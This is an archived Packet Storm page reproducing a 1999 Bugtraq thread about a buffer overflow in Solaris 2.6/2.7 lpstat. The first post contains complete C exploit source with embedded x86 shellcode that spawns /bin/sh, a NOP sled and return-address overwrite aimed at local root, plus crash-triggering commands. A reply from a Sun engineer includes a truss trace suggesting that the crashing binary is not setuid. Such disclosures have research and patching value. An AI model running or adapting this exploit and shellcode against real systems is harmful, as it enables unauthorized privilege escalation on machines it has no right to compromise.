exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

lpstat.x86.c

lpstat.x86.c
Posted Aug 17, 1999
Authored by Plasmoid

lpstat Exploit code for Solaris 2.6/2.7 X86 versions, resulting in local root compromise.

tags | exploit, x86, local, root
systems | solaris
SHA-256 | b4a5c4a3ef8e9b18f9d8d1fc2bc0e1ddaaf747d7e6ab6689b898a8f73c30be07

lpstat.x86.c

Change Mirror Download
Date: Tue, 26 Jan 1999 15:02:47 +0000
From: plasmoid deep/thc/clb <plasmoid@PIMMEL.COM>
To: BUGTRAQ@netspace.org
Subject: Buffer overflow in Solaris 2.6/2.7 /usr/bin/lpstat


On Aug/25/98 Sun released the following patches for lp:

Solaris2.6 Sparc: 106235-02
Solaris2.6 x86: 106236

It is quite sad, that they did not fix another overflow in
/usr/bin/lpstat. I testified this bug on either Solaris 2.7 x86
and 2.6 Sparc, I assume that it is also present on Solaris 2.6
x86 and 2.7 Sparc.

Solaris 2.7 x86
% plasmoid@gorkie:foo> lpstat -c `perl -e 'print "A" x 998'`
% UX:lpstat: ERROR: Class
[...]
% AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" does
% not exist.
% TO FIX: Use the "lpstat -c all" command to list
% all known classes.
% Segmentation Fault
% plasmoid@gorkie:foo>

Solaris 2.6 Sparc
% plasmoid@bock:foo> lpstat -c `perl -e 'print "AAAA" x 250'`
% UX:lpstat: ERROR: Class
[...]
% AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" does not
% exist.
% TO FIX: Use the "lpstat -c all" command to list
% all known classes.
% Segmentation Fault
% plasmoid@bock:foo>

This overflow is definitly exploitable, i attached the exploit for
Solaris x86. Quality patches for all Solaris versions can be obtained
>from www.hert.org, a fast security source.

plasmoid deep/thc/clb
http://thc.inferno.tusculum.edu


/*
* lpstat sploit for solaris 2.6/2.7
* by plasmoid/deep/thc <plasmoid@pimmel.com> (c) 1999
* supported by insected and wilkins
*
* THC - The Hacker's Choice
* http://thc.inferno.tusculum.edu
*/



#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>


char shell[] =
"\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xb4"
"\x88\x46\xb9\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x8d\xe8\xdf"
"\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\xb0\x17\xe8\xd2\xff\xff\xff"
"\x83\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53\x8d\x1e\x89\x5e\x08\x53"
"\xb0\x3b\xe8\xbb\xff\xff\xff\x83\xc4\x0c\xe8\xbb\xff\xff\xff\x2f"
"\x62\x69\x6e\x2f\x73\x68\xff\xff\xff\xff\xff\xff\xff\xff\xff";

const int buffersize=1100;
const char x86_nop=0x90;
long nop,esp;
long offset=0;
char buffer[2000];

long get_esp() { __asm__("movl %esp,%eax"); }

int main (int argc, char *argv[]) {
int i;

/* you shouldn't edit the offset, we run with
800 nops in 1100 bytes buffer, one of those
nops should be hit */

if (argc > 1) offset = strtol(argv[1], NULL, 0);

/* if you don't succeed, modify the nop count,
the standart value of 801 bybtes is quite
strange enuff */

if (argc > 2) nop = strtoul(argv[2], NULL, 0);
else
nop = 801;

esp = get_esp();

memset(buffer, x86_nop, buffersize);
memcpy(buffer+nop, shell, strlen(shell));
for (i = nop+strlen(shell); i < buffersize-4; i += 4)
*((int *) &buffer[i]) = esp+offset;

execl("/usr/bin/lpstat", "lpstat", "-c", buffer, NULL);

printf("exec failed!\n");
return 0;
}

---------------------------------------------------------------------

Date: Thu, 28 Jan 1999 21:32:28 +0100
From: Casper Dik <casper@HOLLAND.SUN.COM>
To: BUGTRAQ@netspace.org
Subject: Re: Buffer overflow in Solaris 2.6/2.7 /usr/bin/lpstat

>On Aug/25/98 Sun released the following patches for lp:
>
> Solaris2.6 Sparc: 106235-02
> Solaris2.6 x86: 106236
>
>It is quite sad, that they did not fix another overflow in
>/usr/bin/lpstat. I testified this bug on either Solaris 2.7 x86
>and 2.6 Sparc, I assume that it is also present on Solaris 2.6
>x86 and 2.7 Sparc.
>
>Solaris 2.7 x86
>% plasmoid@gorkie:foo> lpstat -c `perl -e 'print "A" x 998'`
>% UX:lpstat: ERROR: Class
> [...]
>% AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" does
>% not exist.
>% TO FIX: Use the "lpstat -c all" command to list
>% all known classes.
>% Segmentation Fault
>% plasmoid@gorkie:foo>


Hm, but if you look at it with truss another picture appears:

It appears that the program that is core dumps is /usr/lib/lp/local/lpstat.
That program is not set-uid. The intervening shell (hm, someone using
system again???) resets the uid.

9125: execve("/usr/bin/lpstat", 0xFFBEF3DC, 0xFFBEF3EC) argc = 3
9125: *** SUID: ruid/euid/suid = 21782 / 0 / 0 ***
9125: *** SGID: rgid/egid/sgid = 320 / 320 / 320 ***
9125: argv: lpstat -c
9125:
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
9126: execve("/bin/sh", 0xFFBEEB98, 0xFFBEF404) argc = 3
9126: argv: sh -c
9126: /usr/lib/lp/local/lpstat -c
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
9126: setuid(21782) = 0
9128: execve("/usr/lib/lp/local/lpstat", 0x0003A654, 0x0003A664) argc = 3
9128: *** SUID: ruid/euid/suid = 21782 / 21782 / 21782 ***
9128: argv: /usr/lib/lp/local/lpstat -c
9128:
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
UX:lpstat: ERROR: Class
"xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx" does
not exist.
TO FIX: Use the "lpstat -c all" command to list
all known classes.
9128: Incurred fault #6, FLTBOUNDS %pc = 0xFF2B679C
9128: siginfo: SIGSEGV SEGV_MAPERR addr=0x78787878
9128: Received signal #11, SIGSEGV [default]
9128: siginfo: SIGSEGV SEGV_MAPERR addr=0x78787878
9128: *** process killed ***

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    0 Files
  • 21
    Mar 21st
    0 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close